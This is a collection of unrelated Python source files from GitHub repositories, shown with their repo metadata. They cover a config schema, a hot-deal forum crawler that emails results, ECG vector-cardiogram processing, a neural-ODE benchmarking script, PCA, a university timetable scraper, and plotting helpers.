string2float(l):\n l = [float(x) for x in l]\n return l","repo_name":"kubasiak/OpenAI_embeddings_clustering","sub_path":"utilities/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"4485735852","text":"# import standard libraries\nimport logging\nfrom pathlib import Path\nfrom typing import Any, Dict, Optional\n# import local files\nfrom schemas.configs.data_sources.MySQLSourceSchema import SSHSchema\nfrom schemas.Schema import Schema\nfrom utils.Logger import Logger\n\nclass LegacyConfigSchema(Schema):\n def __init__(self, name:str, all_elements:Dict[str, Any]):\n self._data_dir : Optional[Path]\n self._ssh_config : Optional[SSHSchema]\n\n if not isinstance(all_elements, dict):\n all_elements = {}\n Logger.Log(f\"For {name} base config, all_elements was not a dict, defaulting to empty dict\", logging.WARN)\n if \"DATA_DIR\" in all_elements.keys():\n self._data_dir = LegacyConfigSchema._parseDataDir(all_elements[\"DATA_DIR\"])\n Logger.Log(f\"Found DATA_DIR legacy item in config file.\", logging.INFO)\n else:\n self._data_dir = Path(\"./data/\")\n if \"SSH_CONFIG\" in all_elements.keys():\n self._ssh_config = LegacyConfigSchema._parseSSHConfig(all_elements[\"SSH_CONFIG\"])\n Logger.Log(f\"Found SSH_CONFIG legacy item in config file.\", logging.INFO)\n else:\n self._ssh_config = None\n# \n # _used = {\"DATA_DIR\", \"SSH_CONFIG\"}\n # _leftovers = { key : val for key,val in all_elements.items() if key not in _used }\n super().__init__(name=name, other_elements={})\n\n @property\n def DataDirectory(self) -> Optional[Path]:\n return self._data_dir\n\n @property\n def SSHConfig(self) -> Optional[SSHSchema]:\n return self._ssh_config\n\n @property\n def AsMarkdown(self) -> str:\n ret_val : str\n\n ret_val = f\"{self.Name}\"\n return ret_val\n\n @staticmethod\n def _parseDataDir(dir) -> Path:\n ret_val : Path\n if isinstance(dir, Path):\n ret_val = dir\n elif isinstance(dir, str):\n ret_val = Path(dir)\n else:\n ret_val = Path(str(dir))\n Logger.Log(f\"Config data dir was unexpected type {type(dir)}, defaulting to Path(str(dir))={ret_val}.\", logging.WARN)\n return ret_val\n\n @staticmethod\n def _parseSSHConfig(ssh) -> SSHSchema:\n ret_val : SSHSchema\n if isinstance(ssh, dict):\n ret_val = SSHSchema(name=\"SSH_CONFIG\", all_elements=ssh)\n else:\n ret_val = SSHSchema(name=\"SSH_CONFIG\", all_elements={})\n Logger.Log(f\"Config ssh config was unexpected type {type(ssh)}, defaulting to default ssh config: {ret_val.AsMarkdown}.\", logging.WARN)\n return ret_val","repo_name":"opengamedata/opengamedata-core","sub_path":"schemas/configs/LegacyConfigSchema.py","file_name":"LegacyConfigSchema.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"85"} +{"seq_id":"2332587221","text":"# -*- coding:utf-8 -*-\nimport datetime\nfrom bs4 import BeautifulSoup\nimport requests\nimport smtplib\nfrom email.mime.text import MIMEText\nimport sqlite3\nfrom apscheduler.schedulers.blocking import BlockingScheduler\n\n\n\n#===========================================================================\ndef crawling(url,page,conn,cur):\n\n # requests로 페이지 가져오기\n text = requests.get(url+str(page)).text\n\n # bs로 파싱\n bs_obj = BeautifulSoup(text,'html.parser')\n\n # 핫딜 게시글 선택\n trs = bs_obj.select('#board_list > div > div.board_main.theme_default > table > tbody > tr')\n\n # 빈 메시지 생성\n message = ''\n\n\n # 핫딜 
게시글 제목과 url을 빈 메시지에 추가\n for tr in reversed(trs[3:]):\n id = tr.find('td',{'class':'id'}).text.strip()\n id2 = cur.execute('SELECT board_id FROM Pages WHERE board_id =?',[id]).fetchone()\n\n if id2 == None:\n type = tr.find('td',{'class':'divsn'}).text.strip()\n name = tr.find('a',{'class':'deco'}).text.strip()\n author = tr.find('td',{'class':'writer'}).text.strip()\n recommend = tr.find('td',{'class':'recomd'}).text.strip()\n if recommend =='':\n recommend = 0\n view = tr.find('td',{'class':'hit'}).text.strip()\n url = tr.find('a',{'class':'deco'})['href']\n print(name)\n # DB에 데이터 입력\n cur.execute('INSERT OR IGNORE INTO Pages (board_id,type,subject,author,recommend,view,url) VALUES (?,?,?,?,?,?,?)',(id,type,name,author,recommend,view,url))\n # 변경내용 저장\n conn.commit()\n message = message+name+'\\n'+url+'\\n'+'\\n'\n else:\n if int(id) == id2[0]:\n continue\n else:\n type = tr.find('td',{'class':'divsn'}).text.strip()\n name = tr.find('a',{'class':'deco'}).text.strip()\n author = tr.find('td',{'class':'writer'}).text.strip()\n recommend = tr.find('td',{'class':'recomd'}).text.strip()\n if recommend =='':\n recommend = 0\n view = tr.find('td',{'class':'hit'}).text.strip()\n url = tr.find('a',{'class':'deco'})['href']\n print(name)\n # DB에 데이터 입력\n cur.execute('INSERT OR IGNORE INTO Pages (board_id,type,subject,author,recommend,view,url) VALUES (?,?,?,?,?,?,?)',(id,type,name,author,recommend,view,url))\n # 변경내용 저장\n conn.commit()\n message = message+name+'\\n'+url+'\\n'+'\\n'\n\n return message,id\n\n#===========================================================================\n\n# 핫딜 목록 메일 보내는 함수 정의\ndef send_mail(id,pw,to,mssg):\n # SMTP연결\n smtp = smtplib.SMTP('smtp.gmail.com', 587)\n smtp.ehlo() # extended hello SMTP확장 목록 요청\n smtp.starttls() # G메일은 tls인증을 사용하기 때문에 tls인증 함수 호출\n smtp.login(id, pw) # 메일계정 로그인\n\n # 메일 본문\n msg = MIMEText(mssg)\n # 메일 제목\n msg['Subject'] = '루리웹핫딜'\n # 수신자\n msg['To'] = to\n\n # 메일 보내기\n smtp.sendmail(id, to, msg.as_string())\n\n # 메일 전송 종료\n smtp.quit()\n\n#===========================================================================\ndef start_crawler():\n # 루리웹 핫딜게시판 주소\n url = 'http://bbs.ruliweb.com/market/board/1020?page='\n # 핫딜게 페이지 지정\n page = 1\n\n # db파일 생성\n conn = sqlite3.connect('hotdeal.sqlite')\n # 커서 생성\n cur = conn.cursor()\n # 테이블 생성\n cur.execute('''\n CREATE TABLE IF NOT EXISTS Pages (\n board_id INTEGER UNIQUE,\n type TEXT,\n subject TEXT,\n author TEXT,\n recommend INTEGER,\n view INTEGER,\n url TEXT\n )''')\n print(datetime.datetime.now())\n print('크롤링 시작')\n message,id = crawling(url,page,conn,cur)\n if message == '':\n print(message)\n print('새로운 핫딜이 없습니다.\\n')\n else:\n # 구글 아이디\n mail_id = '*******'\n # 구글 비밀번호\n mail_pw = '*******'\n # 수신자 메일 주소\n to_mail = '*******@naver.com'\n\n print('메일 전송')\n send_mail(mail_id,mail_pw,to_mail,message)\n print('전송 완료')\n\n\n# 1시간 간격으로 크롤러 실행\nsched = BlockingScheduler()\nsched.add_job(start_crawler,'interval', hours=1)\nsched.start()\n","repo_name":"valborgs/rurihotdeal","sub_path":"hotdeal_crawler.py","file_name":"hotdeal_crawler.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"25825530062","text":"import array\nimport base64\n\nimport numpy as np\n\nimport xmltodict\n\n__author__ = \"Will Hewitt\"\n__credits__ = [\"Will Hewitt\"]\n__version__ = \"1.0.0\"\n__maintainer__ = \"Will Hewitt\"\n__email__ = \"william.hewitt@auckland.ac.nz\"\n__status__ = \"Development\"\n\nclass VCG:\n \"\"\" 
Class to compute VCG loops and calculate metrics \"\"\"\n \n # matrix to reconstruct Franks XYZ from 8L \n franks_x = np.matrix('-0.172; -0.074; 0.122; 0.231; 0.239; 0.194; 0.156; -0.010')\n franks_y = np.matrix('0.057; -0.019; -0.106; -0.022; 0.041; 0.048; -0.227; 0.887')\n franks_z = np.matrix('-0.229; -0.310; -0.246; -0.063; 0.055; 0.108; 0.022; 0.102')\n\n def __init__(self, ecg):\n\n self.ecg = ecg\n\n self.FranksX = np.zeros((ecg.lead_sample_count, 1))\n self.FranksY = np.zeros((ecg.lead_sample_count, 1))\n self.FranksZ = np.zeros((ecg.lead_sample_count, 1))\n\n self.__construct_franks()\n \n def mean_spatial_qrs_t(self):\n raise NotImplementedError\n \n def peak_spatial_qrs_t(self):\n raise NotImplementedError\n \n def __construct_franks(self):\n\n for i in range(0, self.ecg.lead_sample_count):\n\n sample = self.ecg.get_8L_sample(i)\n\n self.FranksX[i] = -1*(sample*self.franks_x)\n self.FranksY[i] = sample*self.franks_y\n self.FranksZ[i] = -1*(sample*self.franks_z)\n \n self.FranksX = np.squeeze(self.FranksX)\n self.FranksY = np.squeeze(self.FranksY)\n self.FranksZ = np.squeeze(self.FranksZ)\n\n\nclass ECG:\n \"\"\" Class that processes an XML file into an ECG object \"\"\" \n\n def __init__(self, path):\n\n try:\n with open(path, 'rb') as xml:\n self.__file = xmltodict.parse(xml.read().decode('utf8'))\n except Exception as e:\n raise e\n\n self.__lead_data = self.__file['RestingECG']['Waveform']['LeadData']\n self.lead_sample_count = int(self.__lead_data[0]['LeadSampleCountTotal'])\n\n self.LeadI = np.zeros((self.lead_sample_count, 1))\n self.LeadII = np.zeros((self.lead_sample_count, 1))\n self.LeadIII = np.zeros((self.lead_sample_count, 1))\n self.LeadAVR = np.zeros((self.lead_sample_count, 1))\n self.LeadAVL = np.zeros((self.lead_sample_count, 1))\n self.LeadAVF = np.zeros((self.lead_sample_count, 1))\n self.LeadV1 = np.zeros((self.lead_sample_count, 1))\n self.LeadV2 = np.zeros((self.lead_sample_count, 1))\n self.LeadV3 = np.zeros((self.lead_sample_count, 1))\n self.LeadV4 = np.zeros((self.lead_sample_count, 1))\n self.LeadV5 = np.zeros((self.lead_sample_count, 1))\n self.LeadV6 = np.zeros((self.lead_sample_count, 1))\n\n self.__unpack()\n\n def get_8L_sample(self, i):\n\n return np.array([ self.LeadV1[i], self.LeadV2[i], self.LeadV3[i], self.LeadV4[i], self.LeadV5[i], self.LeadV6[i], self.LeadI[i], self.LeadII[i] ])\n\n def __unpack(self):\n\n for lead in self.__lead_data:\n\n lead_id = lead['LeadID']\n lead_data = lead['WaveFormData']\n lead_b64 = base64.b64decode(lead_data)\n lead_vals = np.array(array.array('h', lead_b64))\n\n if lead_id == 'I':\n self.LeadI = lead_vals\n elif lead_id == 'II':\n self.LeadII = lead_vals\n elif lead_id == 'V1':\n self.LeadV2 = lead_vals\n elif lead_id == 'V2':\n self.LeadV2 = lead_vals\n elif lead_id == 'V3':\n self.LeadV3 = lead_vals\n elif lead_id == 'V4':\n self.LeadV4 = lead_vals\n elif lead_id == 'V5':\n self.LeadV5 = lead_vals\n elif lead_id == 'V6':\n self.LeadV6 = lead_vals\n\n self.LeadIII = np.subtract(self.LeadII, self.LeadI)\n self.LeadAVR = np.add(self.LeadI, self.LeadII)*(-0.5)\n self.LeadAVL = np.subtract(self.LeadI, 0.5*self.LeadII)\n self.LeadAVF = np.subtract(self.LeadII, 0.5*self.LeadI)\n","repo_name":"hewittwill/PyVCG","sub_path":"PyVCG.py","file_name":"PyVCG.py","file_ext":"py","file_size_in_byte":4011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"33680569642","text":"class Simulation(object):\n def __init__(self, env, agent):\n self.env = env\n self.agent = 
agent\n \n #logging\n self.rewards = []\n def play(self, num_episodes, render):\n for i in range(num_episodes):\n state = self.env.reset()\n done = False\n total_reward = 0\n while not done:\n if render:\n self.env.render()\n action = self.agent.select_action(state)\n state, reward, done, info = self.env.step(action)\n total_reward+=reward\n self.rewards.append(total_reward)","repo_name":"alexandrumilu/rl","sub_path":"Simulation.py","file_name":"Simulation.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"21315411500","text":"\nMAX_TRIES = 10\n\ndef delete(server, dbname):\n \"\"\"\n Deletes a database, trying many times before failing. This is because\n couch doesn't like deleting databases in windows.\n \"\"\"\n tries = 0\n e = \"UNKNOWN REASON\"\n while tries < MAX_TRIES:\n try: \n server.delete_db(dbname)\n return\n except Exception as e: \n # logging.error(\"Can't delete database %s. %s\" % (dbname, e))\n tries += 1\n if tries == MAX_TRIES:\n raise Exception(\"Unable to delete %s after %s tries. Because: %s\" % \\\n (dbname, MAX_TRIES, e))","repo_name":"dimagi/dimagi-utils","sub_path":"dimagi/utils/couch/delete.py","file_name":"delete.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"85"} +{"seq_id":"28042098300","text":"# Imports\nimport sys\nimport os\nimport argparse\nimport inspect\nfrom datetime import datetime\nimport numpy as np\n\nimport torch\nimport scipy\nimport tensorflow as tf\nfrom tensorflow import keras\n\nfrom scipy.integrate import odeint, solve_ivp\n\n#from datagenerator import DataGenerator\nfrom datahandler import DataHandler\nfrom odenet import ODENet\nfrom read_config import read_arguments_from_file\nfrom visualization_inte import *\nfrom helper_true_velo import *\n\n\n\ndef _build_save_file_name(save_path, epochs):\n return 'scDVF_{}-{}-{}({};{})_{}_{}epochs'.format(str(datetime.now().year), str(datetime.now().month),\n str(datetime.now().day), str(datetime.now().hour), str(datetime.now().minute), save_path, epochs)\n\ndef save_model(odenet, folder, filename):\n odenet.save('{}{}.pt'.format(folder, filename))\n\nparser = argparse.ArgumentParser('Testing')\nparser.add_argument('--settings', type=str, default='config_inte.cfg')\nclean_name = \"chalmers_690genes_150samples_earlyT_0bimod_1initvar\" \nclean_name_velo = \"chalmers_690genes_150samples_earlyT_0bimod_1initvar_DERIVATIVES\" \nparser.add_argument('--data', type=str, default='/home/ubuntu/neural_ODE/ground_truth_simulator/clean_data/{}.csv'.format(clean_name))\nparser.add_argument('--velo_data', type=str, default='/home/ubuntu/neural_ODE/ground_truth_simulator/clean_data/{}.csv'.format(clean_name_velo))\n\n\nargs = parser.parse_args()\n\n# Main function\nif __name__ == \"__main__\":\n print('Setting recursion limit to 3000')\n sys.setrecursionlimit(3000)\n print('Loading settings from file {}'.format(args.settings))\n settings = read_arguments_from_file(args.settings)\n cleaned_file_name = clean_name\n save_file_name = _build_save_file_name(cleaned_file_name, settings['epochs'])\n\n if settings['debug']:\n print(\"********************IN DEBUG MODE!********************\")\n save_file_name= '(DEBUG)' + save_file_name\n output_root_dir = '{}/{}/'.format(settings['output_dir'], save_file_name)\n\n img_save_dir = '{}img/'.format(output_root_dir)\n interm_models_save_dir = '{}interm_models/'.format(output_root_dir)\n 
#intermediate_models_dir = '{}intermediate_models/'.format(output_root_dir)\n\n # Create image and model save directory\n if not os.path.exists(output_root_dir):\n os.makedirs(output_root_dir, exist_ok=True)\n if not os.path.exists(img_save_dir):\n os.mkdir(img_save_dir)\n if not os.path.exists(interm_models_save_dir):\n os.mkdir(interm_models_save_dir)\n\n # Save the settings for future reference\n with open('{}/settings.csv'.format(output_root_dir), 'w') as f:\n f.write(\"Setting,Value\\n\")\n for key in settings.keys():\n f.write(\"{},{}\\n\".format(key,settings[key]))\n\n # Use GPU if available\n if not settings['cpu']:\n os.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n print(\"Trying to run on GPU -- cuda available: \" + str(torch.cuda.is_available()))\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n print(\"Running on\", device)\n #device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n else:\n print(\"Running on CPU\")\n device = 'cpu'\n \n data_handler = DataHandler.fromcsv(args.data, device, settings['val_split'], normalize=settings['normalize_data'], \n batch_type=settings['batch_type'], batch_time=settings['batch_time'], \n batch_time_frac=settings['batch_time_frac'],\n noise = 0,\n img_save_dir = img_save_dir,\n scale_expression = settings['scale_expression'],\n log_scale = settings['log_scale'],\n init_bias_y = settings['init_bias_y'])\n \n data_handler_velo = DataHandler.fromcsv(args.velo_data, device, settings['val_split'], normalize=settings['normalize_data'], \n batch_type=settings['batch_type'], batch_time=settings['batch_time'], \n batch_time_frac=settings['batch_time_frac'],\n noise = 0,\n img_save_dir = img_save_dir,\n scale_expression = settings['scale_expression'],\n log_scale = settings['log_scale'],\n init_bias_y = settings['init_bias_y'])\n\n # Initialization\n odenet = ODENet(device, data_handler.dim, explicit_time=settings['explicit_time'], neurons = settings['neurons_per_layer'], \n log_scale = settings['log_scale'], init_bias_y = settings['init_bias_y'])\n odenet.float()\n param_count = sum(p.numel() for p in odenet.parameters() if p.requires_grad)\n param_ratio = round(param_count/ (data_handler.dim)**2, 3)\n print(\"Using a NN with {} neurons per layer, with {} trainable parameters, i.e. 
parametrization ratio = {}\".format(settings['neurons_per_layer'], param_count, param_ratio))\n \n pretrained_model_file = '/home/ubuntu/neural_ODE/ode_net/code/output/_pretrained_best_model/best_val_model.pt'\n odenet.load(pretrained_model_file)\n \n with open('{}/network.txt'.format(output_root_dir), 'w') as net_file:\n net_file.write(odenet.__str__())\n net_file.write('\\n\\n\\n')\n net_file.write(inspect.getsource(ODENet.forward))\n net_file.write('\\n')\n\n #quit()\n\n # Init plot\n if settings['viz']:\n visualizer = Visualizator1D(data_handler, odenet, settings)\n\n if settings['viz']:\n with torch.no_grad():\n visualizer.visualize()\n visualizer.plot()\n visualizer.save(img_save_dir, 0)\n \n \n #DYNAMO vector field RKHS regression\n for train_noise_level in [0 ,0.025, 0.05, 0.1]:\n dynamo_vf_inputs = get_true_val_velocities(odenet, data_handler, data_handler_velo, settings['method'], settings['batch_type'], noise_for_training= train_noise_level)\n \n X_train = dynamo_vf_inputs['x_train']\n X_val = dynamo_vf_inputs['x_val']\n X_val_target = dynamo_vf_inputs['x_target_val']\n X_full = dynamo_vf_inputs['x_full']\n Y_train = dynamo_vf_inputs['true_velo_x_train']\n Y_val = dynamo_vf_inputs['true_velo_x_val']\n Y_full = dynamo_vf_inputs['true_velo_x_full']\n t_val = dynamo_vf_inputs['t_val']\n phx_val_set_pred = dynamo_vf_inputs['phx_val_set_pred']\n \n\n print(\"..................................\")\n print(\"PHX val corr vs true velos (w/o access!):\", \n round(np.corrcoef(Y_val.flatten(), phx_val_set_pred.flatten())[0,1], 4))\n #print(\"PHX val MSE vs true velos (w/o access!): {:.3E}\".format(np.mean((Y_val.flatten() - phx_val_set_pred.flatten())**2)))\n \n \n print(\"creating scDVF VAE model..\")\n input_dim = keras.Input(shape=(X_train.shape[1],))\n encoded = keras.layers.Dense(64, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(input_dim)\n encoded = keras.layers.Dense(64, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(encoded)\n encoded = keras.layers.Dense(64, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(encoded)\n encoded = keras.layers.Dense(16, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(encoded)\n\n decoded = keras.layers.Dense(16, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(encoded)\n decoded = keras.layers.Dense(64, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(decoded)\n decoded = keras.layers.Dense(64, activation=\"relu\", activity_regularizer=keras.regularizers.l1(1e-6))(decoded)\n decoded = keras.layers.Dense(64, activity_regularizer=keras.regularizers.l1(1e-6))(decoded)\n decoded = keras.layers.Dense(Y_train.shape[1])(decoded)\n\n encoder = keras.Model(input_dim, encoded)\n autoencoder = keras.Model(input_dim, decoded)\n\n opt = keras.optimizers.Adam(learning_rate=0.00005)\n autoencoder.compile(optimizer=opt, loss='mse')\n #autoencoder.summary()\n print(\"done creating model, fitting now..\")\n \n es = keras.callbacks.EarlyStopping(monitor='val_loss', patience=10)\n autoencoder.fit(X_train, Y_train,\n epochs=100,\n batch_size=2,\n shuffle=True,\n validation_data=(X_val, Y_val),\n callbacks=[es], \n verbose = 0)\n\n pred_val = autoencoder.predict(X_val, verbose = 0).flatten() \n corr_coeff_val = round(np.corrcoef(Y_val.flatten(), \n pred_val)[0,1], 4)\n pred_train = autoencoder.predict(X_train, verbose = 0).flatten() \n corr_coeff_train = round(np.corrcoef(Y_train.flatten(), \n pred_train)[0,1], 4)\n print(\"\")\n 
print(\"train corr:\", corr_coeff_train, \", val_corr:\", corr_coeff_val)\n print(\"..................................\")\n print(\"Now doing trajectory work...\")\n\n \n velo_fun_x = lambda t,x : np.squeeze(autoencoder.predict(np.expand_dims(x, axis = 0), \n verbose = 0))\n\n pred_next_pts = pred_traj_given_ode(my_ode_func = velo_fun_x, \n X_val = X_val, \n t_val = t_val)\n\n mse_val_traj = np.mean((X_val_target - pred_next_pts)**2)\n print(\"MSE val traj = {:.3E}\".format(mse_val_traj)) \n print(\"..................................\")\n \n # print(\"obtaining GRN now..\\n\")\n\n # def reverse_raw_ae(t, in_x):\n # input_x = tf.convert_to_tensor(np.expand_dims(in_x, axis=0))\n # dx = autoencoder.predict(input_x, verbose = 0).flatten() \n # return dx \n\n\n # def short_reverse_interpolate(y0, X_full, neigh, pca, umap_reducer, steps, intermediate_steps, noise_sd):\n # solution = []\n # for step in range(steps):\n # # Interpolate using autoencoder\n # t_eval = list(range(intermediate_steps))\n # noise = np.random.normal(0, noise_sd)\n # sol = solve_ivp(reverse_raw_ae, [min(t_eval), max(t_eval)], y0+noise, method=\"RK23\", t_eval=t_eval)\n # y = sol.y.T\n \n # # Lower dimensionality\n # ending_pt_pca = pca.transform(np.nan_to_num(np.log1p(y)))\n \n # # Find knn reference points\n # interp_neigh = neigh.kneighbors(ending_pt_pca)\n \n # # New reference point\n # y0 = np.median(X_full[interp_neigh[1][-1, :], :], axis=0)\n # solution.append(y0)\n \n # return np.array(solution)\n\n\n # # PCA the count data\n # pca = sklearn.decomposition.PCA(n_components=30)\n # adata_pca = pca.fit_transform(np.log1p(X_full))\n # # Further reduce the dim with UMAP\n # umap_reducer = umap.UMAP(random_state=42)\n # adata_umap = umap_reducer.fit_transform(adata_pca)\n # # Construct KNN with PCA\n # neigh = sklearn.neighbors.NearestNeighbors(n_neighbors=30)\n # neigh.fit(adata_pca)\n\n # n_cells = 200\n # num_steps = 15\n # cell_path = np.zeros((n_cells, num_steps, X_full.shape[1]))\n # for i in range(n_cells):\n # print(i)\n # y0 = np.random.rand(X_full.shape[1])\n # y0_noise = 0\n # # Solve for the cell with initial & velocity noise\n # y_solution = short_reverse_interpolate(y0+y0_noise, X_full = X_full, \n # neigh = neigh, pca = pca,\n # umap_reducer = umap_reducer, \n # steps = num_steps,\n # intermediate_steps = 5, \n # noise_sd = 0)\n # cell_path[i] = y_solution\n \n \n # cell_path = pd.DataFrame(data=cell_path[:,2,:])\n # corr = cell_path.corr(method='pearson').fillna(0)\n # corr = corr.loc[:, (corr != 0).any(axis=0)]\n # corr = corr.loc[(corr != 0).any(axis=1), :]\n # np.savetxt(\"/home/ubuntu/neural_ODE/ode_net/code/model_inspect/effects_mat_{}.csv\".format(noise_level), corr, delimiter=\",\")\n\n \n \n \n","repo_name":"QuackenbushLab/phoenix","sub_path":"benchmarked_methods/code/scDVF_extract_matrix.py","file_name":"scDVF_extract_matrix.py","file_ext":"py","file_size_in_byte":12856,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"85"} +{"seq_id":"27042967573","text":"\nfrom numpy.linalg import eigh\n\nfrom fastats.scaling import demean\n\n\ndef pca(data, components=4):\n \"\"\"\n Principal Component Analysis, returning\n the transformed data.\n\n This does not scale the data.\n\n Examples\n --------\n\n >>> x = np.array([\n ... [1, 2, 3],\n ... [4, 5, 6],\n ... [7, 8, 9]\n ... ])\n >>> np.abs(pca(x, components=1))\n array([[5.19615242],\n [0. 
],\n [5.19615242]])\n \"\"\"\n demeaned_data = demean(data)\n cov = demeaned_data.T @ demeaned_data\n # eigh returns ordered eigenvalues\n _, V = eigh(cov)\n\n V = V.T[::-1].T[:, :components]\n\n trans = (V.T @ demeaned_data.T).T\n return trans\n\n\nif __name__ == '__main__':\n import pytest\n pytest.main([__file__])\n","repo_name":"fastats/fastats","sub_path":"fastats/linear_algebra/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"85"} +{"seq_id":"15126980587","text":"# coding:utf-8\nimport codecs\n\nimport requests\nimport csv\nfrom bs4 import BeautifulSoup\nimport pymysql\nimport re\nimport sys\n\n\nclass XDspiderKeBiao:\n def __init__(self, auth_url=None, log_url=None):\n if not auth_url:\n # 登录界面 post\n self.auth_url = \"http://ids.xidian.edu.cn/authserver/login?service=http%3A%2F%2Fjwxt.xidian.edu.cn%2Fcaslogin.jsp\"\n self.log_url = \"http://jwxt.xidian.edu.cn/caslogin.jsp\"\n else:\n self.auth_url = auth_url\n self.log_url = log_url\n self.session = requests.Session()\n\n def login(self, id='', password=''):\n r = self.session.get(self.auth_url)\n data = r.text\n bsObj = BeautifulSoup(data, \"html.parser\")\n # 登录所需信息\n lt_value = bsObj.find(attrs={\"name\": \"lt\"})['value']\n exe_value = bsObj.find(attrs={\"name\": \"execution\"})['value']\n params = {'username': id, 'password': password,\n \"submit\": \"\", \"lt\": lt_value, \"execution\": exe_value,\n \"_eventId\": \"submit\", \"rmShown\": '1'}\n # 模拟登录报头\n headers = {'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\",\n 'Accept': \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Referer\": \"http://ids.xidian.edu.cn/authserver/login?service=http%3A%2F%2Fjwxt.xidian.edu.cn%2Fcaslogin.jsp\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"}\n s = self.session.post(self.auth_url, data=params, headers=headers)\n s = self.session.get(self.log_url)\n # 将爬取的数据存为CSV文件\n\n def Store(self):\n grade_page = self.session.get(\n \"http://yjsxt.xidian.edu.cn/eduadmin/findCaresultByStudentAction.do\")\n\n bsObj = BeautifulSoup(grade_page.text, \"html.parser\")\n bsObj.encode('utf-8')\n table = bsObj.findAll(\"table\", {\"class\": \"arranging_arrange\"})[0]\n rows = table.findAll(\"tr\")\n\n csvFile = file('./kebiao.csv', 'wb',)\n csvFile.write(codecs.BOM_UTF8)\n writer = csv.writer(csvFile)\n\n writer.writerow(('week', 'one', 'two', 'three', 'four', 'five', 'six', 'seven'))\n csvRow = []\n\n try:\n for row in rows:\n csvRow = []\n for cell in row.findAll('td'):\n csvRow.append(cell.get_text().strip().encode('utf-8'))\n writer.writerow(csvRow)\n finally:\n csvFile.close()\n\n # 将CSV文件存入MySQL\n def saveMysql(self):\n csvFile1 = codecs.open('./kebiao.csv', 'r')\n reader = csv.DictReader(csvFile1)\n\n csvFile = file('./kebiao2.csv', 'wb')\n writer1 = csv.writer(csvFile)\n csvFile.write(codecs.BOM_UTF8)\n writer1.writerow(('one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight','nine'))\n a = []\n b = []\n c = []\n d = []\n g = []\n for e in reader:\n a.append(e['one'])\n b.append(e['two'])\n c.append(e['three'])\n d.append(e['four'])\n g.append(e['five'])\n writer1.writerow(a)\n writer1.writerow(b)\n writer1.writerow(c)\n writer1.writerow(d)\n writer1.writerow(g)\n #print(a)\n #print(b)\n def reader(self,stu_id):\n\n csvFile2 = 
codecs.open('./kebiao2.csv', 'r',)\n reader1 = csv.DictReader(csvFile2)\n i = 1\n #print(reader1)\n for e in reader1:\n\n\n\n\n\n # 连接到数据库\n\n connection = pymysql.connect(host='127.0.0.1', user='root', password='root', db='xidian', charset='utf8',\n cursorclass=pymysql.cursors.DictCursor)\n # 执行sql语句\n # strip() 去除空格\n try:\n with connection.cursor() as cursor:\n sql = \"insert into `course`(`stu_id`,`weekday`,`one`,`three`,`five`,`seven`,`nine`)values(%s,%s,%s,%s,%s,%s,%s)\"\n # # 使用 execute() 方法执行 SQL 查询\n\n cursor.execute(sql, (\n stu_id,i, e['\\xef\\xbb\\xbfone'], e['three'], e['five'], e['seven'], e['nine'],))\n\n connection.commit()\n\n finally:\n\n connection.close()\n i = i + 1\n#Java调用时传递的参数格式[sno,password,stu_id]\nif __name__ == '__main__':\n #设置编码格式\n reload(sys)\n sys.setdefaultencoding('utf-8')\n # 初始化爬虫对象\n XD = XDspiderKeBiao()\n # 登录(在此处传入正确的个人学号与密码信息)\n XD.login(sys.argv[0],sys.argv[1])\n XD.Store()\n XD.saveMysql()\n XD.reader(sys.argv[2])\n","repo_name":"joeyos/Spider","sub_path":"code/XDSpider_Python27Tojava/XIDIAN/kebiao.py","file_name":"kebiao.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"73045026198","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n\n'''\n The following helpers: plot_points and display has been taken as a reference from: \n https://github.com/udacity/deep-learning-v2-pytorch/blob/master/intro-neural-networks/gradient-descent/GradientDescent.ipynb\n'''\n\ndef plot_points(X, y):\n '''\n plot_points will generate an scatter plot where students has been rejected or accepted\n\n parameters: \n -----------\n X: int, representative of the coordinates of the points to plot \n Y: int, label that indicates if a student has been accepted (1) and rejected(0)\n\n '''\n admitted = X[np.argwhere(y==1)]\n rejected = X[np.argwhere(y==0)]\n plt.scatter([coords[0][0] for coords in rejected], [coords[0][1] for coords in rejected], s = 25, color = 'green', edgecolor = 'k')\n plt.scatter([coords[0][0] for coords in admitted], [coords[0][1] for coords in admitted], s = 25, color = 'red', edgecolor = 'k')\n\ndef display(m, b, color='gray', linestyle='--'):\n '''\n display will generate the plot scales for the X and y axis and will draw the line\n\n parameters: \n ----------\n m: float, slope of the line \n b: float, intercept of the line \n '''\n 